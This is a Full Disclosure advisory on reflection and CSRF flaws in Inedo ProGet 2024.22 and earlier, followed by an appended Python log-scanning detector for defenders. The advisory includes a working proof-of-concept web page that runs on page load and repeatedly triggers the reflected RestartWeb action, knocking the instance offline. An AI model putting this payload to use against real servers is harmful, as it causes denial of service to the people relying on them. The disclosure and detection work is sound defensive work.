Inedo ProGet Insecure Reflection and CSRF Vulnerabilities
Inedo ProGet 2024.22 and earlier contain unauthenticated denial-of-service and information-disclosure vulnerabilities, caused by exposed C# reflection and missing CSRF protection. Attackers can use them to cancel executions, restart the instance, and so on; a sample script is provided. 2025-4-27 04:43:6 Author: seclists.org (view original)


Full Disclosure mailing list archives


From: Daniel Owens via Fulldisclosure <fulldisclosure () seclists org>
Date: Sat, 26 Apr 2025 07:12:32 +0000

Inedo ProGet 2024.22 and below are vulnerable to unauthenticated denial of service and information disclosure attacks 
(among other things) because the information system directly exposes the C# reflection used during the request-action 
mapping process and fails to properly protect certain pathways.  These are amplified by cross-site request forgery 
vulnerabilities (CSRF) due to the application's failure to verify the HTTP request method and apply CSRF protections 
accordingly.  Specifically, unauthenticated attackers can chain CSRF and reflection attacks to cancel executions, 
restart the ProGet instance, and perform certain other actions.  The following is a sample script that can be used to 
demonstrate the vulnerability, restarting the victim Inedo ProGet instance ad infinitum.  Notably, this attack will 
work regardless of browser pre-flight protections, etc., since ProGet ignores the HTTP request method.  It is likely 
that more recent versions are also vulnerable to this, but the CSRF portion allows attacking internal (private) 
instances in addition to directly accessible (e.g., public) instances.  This vulnerability is known to exist across 
multiple major versions.

<!DOCTYPE html>
<html lang="en">
<head>
<script>
function sleep(ms) {
  return new Promise(resolve => setTimeout(resolve, ms));
}
function sendData() {
  // HEAD is a CORS-safelisted method, so no pre-flight; ProGet ignores the method anyway
  var xhr = new XMLHttpRequest();
  xhr.open('HEAD',
    'http://vict.im/0x44/ProGet.WebApplication/Inedo.ProGet.WebApplication.Pages.Errors.UserNotFoundErrorPage/RestartWeb');
  xhr.send();
}
async function executeDosAttack() {
  while (true) {
    try {
      sendData();
      sendData();
      // Sleep for 500 ms
      await sleep(500);
    } catch (ignoreMe) {
      // Gobble up exceptions since we expect the service to go down and
      // pre-flight triggers the shutdown anyway
    }
  }
}
</script>
</head>
<body onload="executeDosAttack()">
<h1>Insecure Reflection + CSRF + DOS Attack</h1>
<p>It's silently working in the background...</p>
</body>
</html>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
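The advisory's key detail is that the reflected page type and method name appear verbatim in the URL path and that ProGet does not check the HTTP method. The following detection script is an added example for defenders, not code from the advisory or from Inedo: it scans constructed access-log lines (the log format, the `TRUSTED_ORIGINS` value and the `burst_threshold` are assumptions) and flags reflected-action requests made with a non-POST method, with a missing or untrusted Origin header, or in a burst from one client, as the PoC above would produce.

```python
import re
from collections import Counter

# ProGet's reflection-based routing, as seen in the advisory's PoC URL:
# ".../ProGet.WebApplication/<fully qualified page type>/<method name>".
REFLECTED_ACTION = re.compile(
    r"/ProGet\.WebApplication/(?P<page>Inedo\.ProGet\.WebApplication\.Pages\.[\w.]+)/(?P<action>\w+)$")
# Assumption: only a POST from a trusted origin is a legitimate way to invoke such an action.
TRUSTED_ORIGINS = {"https://proget.internal.example"}  # placeholder value

# Constructed log lines: "<client_ip> <method> <path> <Origin header or -> <status>" (not ProGet's real log format).
SAMPLE_LOG = """\
203.0.113.7 HEAD /0x44/ProGet.WebApplication/Inedo.ProGet.WebApplication.Pages.Errors.UserNotFoundErrorPage/RestartWeb - 200
203.0.113.7 HEAD /0x44/ProGet.WebApplication/Inedo.ProGet.WebApplication.Pages.Errors.UserNotFoundErrorPage/RestartWeb https://attacker.example 200
203.0.113.7 HEAD /0x44/ProGet.WebApplication/Inedo.ProGet.WebApplication.Pages.Errors.UserNotFoundErrorPage/RestartWeb - 200
198.51.100.4 GET /feeds/public-nuget/v3/index.json - 200
10.0.0.5 POST /0x44/ProGet.WebApplication/Inedo.ProGet.WebApplication.Pages.Errors.UserNotFoundErrorPage/RestartWeb https://proget.internal.example 302
"""

def parse_line(line):
    """Split one constructed log line into its fields."""
    ip, method, path, origin, status = line.split()
    return {"ip": ip, "method": method, "path": path,
            "origin": None if origin == "-" else origin, "status": int(status)}

def classify(entry):
    """Return the reasons a request looks like reflected-action abuse, or [] if it looks legitimate."""
    m = REFLECTED_ACTION.search(entry["path"])
    if not m:
        return []
    reasons = []
    if entry["method"] != "POST":  # ProGet ignores the method, so HEAD/GET hits are a red flag
        reasons.append(f"{entry['method']} used for reflected action {m['action']}")
    if entry["origin"] is None:
        reasons.append("no Origin header on reflected action")
    elif entry["origin"] not in TRUSTED_ORIGINS:
        reasons.append(f"untrusted Origin {entry['origin']}")
    return reasons

def scan(log_text, burst_threshold=3):
    """Return (findings, bursts): flagged requests, and clients hammering reflected actions."""
    findings, per_ip = [], Counter()
    for line in log_text.strip().splitlines():
        entry = parse_line(line)
        if REFLECTED_ACTION.search(entry["path"]):
            per_ip[entry["ip"]] += 1
        reasons = classify(entry)
        if reasons:
            findings.append((entry["ip"], entry["path"].rsplit("/", 1)[-1], reasons))
    return findings, {ip: n for ip, n in per_ip.items() if n >= burst_threshold}
```

Running `scan(SAMPLE_LOG)` on the constructed lines flags the three HEAD requests from 203.0.113.7 and reports that client as a burst, while the in-origin POST and the feed download pass.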



Source: https://seclists.org/fulldisclosure/2025/Apr/30